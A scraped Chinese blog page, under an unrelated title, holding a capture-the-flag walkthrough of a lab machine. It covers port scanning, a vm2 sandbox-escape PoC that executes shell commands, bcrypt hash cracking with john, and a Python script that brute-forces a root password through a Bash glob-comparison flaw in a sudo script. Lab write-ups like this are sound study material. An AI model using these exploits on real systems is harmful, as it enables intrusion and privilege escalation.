当前位置: 首页 > news >正文

单页网站的域名wordpress 定时备份

单页网站的域名,wordpress 定时备份,品牌形象宣传策划方案,浮动播放器wordpress首先nmap扫描端口 nmap -sV -sC -p- -v --min-rate 1000 10.10.11.239扫出来三个端口#xff0c;22端口为ssh服务#xff0c;80端口有http服务#xff0c;3000端口为nodejs框架 尝试访问下80端口#xff0c;发现页面重定向 将该域名添加到hosts里 sudo vim /etc/hosts 成…首先nmap扫描端口 nmap -sV -sC -p- -v --min-rate 1000 10.10.11.239扫出来三个端口22端口为ssh服务80端口有http服务3000端口为nodejs框架 尝试访问下80端口发现页面重定向 将该域名添加到hosts里 sudo vim /etc/hosts 成功访问 发现提供的代码编辑器是vm2沙箱搜了下相关文章发现存在漏洞 poc如下参考链接 const {VM} require(vm2); const vm new VM();const code err {}; const handler {getPrototypeOf(target) {(function stack() {new Error().stack;stack();})();} };const proxiedErr new Proxy(err, handler); try {throw proxiedErr; } catch ({constructor: c}) {c.constructor(return process)().mainModule.require(child_process).execSync(touch pwned); }console.log(vm.run(code));成功命令执行 修改一下直接反弹shell 我们查看下用户信息 cat /etc/passwd当前用户svc那么我们可以利用的应该就是joshua 我们在/var/www/contact目录下发现个文件tickets.db 我们用strings命令看一下 得到信息为sqlite数据库还有用户joshua的密码哈希值 用hashid看下是什么加密发现是bcrypt 那么使用工具john的参数–format去爆破 john --formatbcrypt -w/usr/share/wordlists/rockyou.txt hash.txt得到密码 然后切换下用户joshua 提升交互权限得到user的flag 查看下有什么可以利用的命令 sudo -lstrings命令查看下具体内容 我们看向关键代码 if [[ $DB_PASS $USER_PASS ]]; then/usr/bin/echo Password confirmed!else/usr/bin/echo Password confirmation failed!exit 1靶机会将我们提交的密码与数据库的密码进行比对比对成功与否对应不同回显关键点在于比对是弱等于也就是说这里的漏洞是由于 Bash 中 [[ ]]内部使用了 它执行模式匹配而不是直接字符串比较。这意味着用户输入 (USER_PASS) 被视为一种模式如果它包含像 * 或 ? 这样的全局字符它可能会匹配意外的字符串。 直接盲注脚本如下 import string import subprocess all list(string.ascii_letters string.digits) password found False while not found: for character in all: command fecho {password}{character}* | sudo /opt/scripts/mysql-backup.sh output subprocess.run(command, shellTrue, stdoutsubprocess.PIPE, stderrsubprocess.PIPE, textTrue).stdout if Password confirmed! in output: password character print(password) break else: found True# password kljh12k3jhaskjh12kjh3用scp命令复制到靶机 成功上传 运行一下得到root密码 切换成root得到flag
http://www.pierceye.com/news/240878/

相关文章:

  • 网站建设骗子公司新开传奇网站发布网
  • 智能模板网站建设方案深圳团购网站设计
  • 网站建设和网页设计用wordpress做网站页面显示404
  • 网站首页百度收录怎么做做装修公司网站
  • 湛江网站排名提升免费网站空间有什么用
  • 装修公司网站 源码绍兴市交通建设检测中心网站
  • 企业建设网站流程图珠海网站建设 旭洁
  • 企业商城网站开发互联网行业公司
  • 中国建设人才服务信息网是正规网站wordpress文章分享
  • 渭南网站建设公司电话央美老师做的家具网站
  • 机械网站建设栏目内容怎么欣赏一个网站设计图
  • 帝国cms 网站搬家wordpress 购物 插件下载
  • 怎么做ppt教程网站手机能访问asp网站
  • 电子商务网站建设与管理教材评价织梦网站地图调用全站文章
  • 020网站开发多少钱汕尾建设网站首页
  • 桓台县建设局网站做弹幕网站有哪些
  • 淘宝客导购网站源码iis默认网站属性
  • 做网站用矢量图还是位图安徽省住房和建设厅网站
  • 彭阳网站建设多少钱嘉兴专业的嘉兴专业网站建设项目
  • 网站建设导航分哪几类公司网站大全
  • 网站建设 实训题安能建设总公司网站打不开
  • 莱西网站建设龙岗中心城有学网站建设
  • 重庆技术网站建设宝安做网站哪家好
  • 仿制网站建设写网站建设的软文
  • 0基础网站建设教程wordpress去掉rss订阅
  • 爱网站查询外贸推广具体是做什么
  • 商务网站价格找人做效果图那个网站
  • 上传到网站租一个服务器要多少钱
  • 网站制作服务合同安徽建设工程信息网文件
  • 成都企业网站建设公司正规的跨境电商平台有哪些